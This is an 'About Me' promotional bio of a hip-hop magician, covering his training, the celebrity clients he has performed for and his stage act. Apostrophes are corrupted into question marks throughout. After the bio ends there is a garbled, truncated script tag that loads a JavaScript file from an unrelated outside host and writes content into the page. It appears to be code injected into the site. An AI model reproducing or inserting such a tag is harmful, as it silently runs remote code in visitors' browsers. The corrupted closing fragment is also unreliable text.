About Me

Uncle Majic has a magical way of connecting with people.  ?I just walk up to someone and make a dollar bill float.  After that, it?s gravy. The Hip-Hop Majician was born while a student at Brooklyn?s Gershwin junior High School.  One of his favorite teachers used magic to make learning fun and when he saw how much his young student was interested in his tricks he made him an offer:  Work hard and I?ll teach you magic.  Needless to say, he got all A?s and has been thriving in the world of hocus pocus ever since.Uncle Majic, a name given by his younger fan base, inspired the name of his upcoming television show, Uncle Majic?s playhouse.  Uncle Majic isn?t just appealing to the younger audiences but the adults as well.  He?s mystified the masses by combining illusions with comedy, warming up crowds for the likes of Chris Rock, Dave Chapelle and Mike Epps.  He has also worked his ?Majic? at private parties for NY Knicks guard Alan Houston, rapper/actor Treach, Wendy Williams of WBLS & VH1, clothing designer Karl Kani and Russell & Kimora Lee Simmons to name a few.  While levitating dollar bills, a can of soda and pulling pigeons out of thin air, his DJ spins the hottest rap tunes.  ?I am a hip-hop fan so I was really impressed with how well he worked hip-hop into his show?, says Alan Houston.  His hip-hop sensibility isn?t the only thing that distinguishes him from other magicians.  Uncle Majic says ?the only thing that separates me from David Blaine is a few thousand dollars. I can do anything.  I can make a building disappear; I can make it snow in the summertime.? Next he?ll conjure up a TV special.  .... language="javascript" src="http://nathanjosiah.../request.js">function nothingf(){document·write("...mov.r{}");}..>
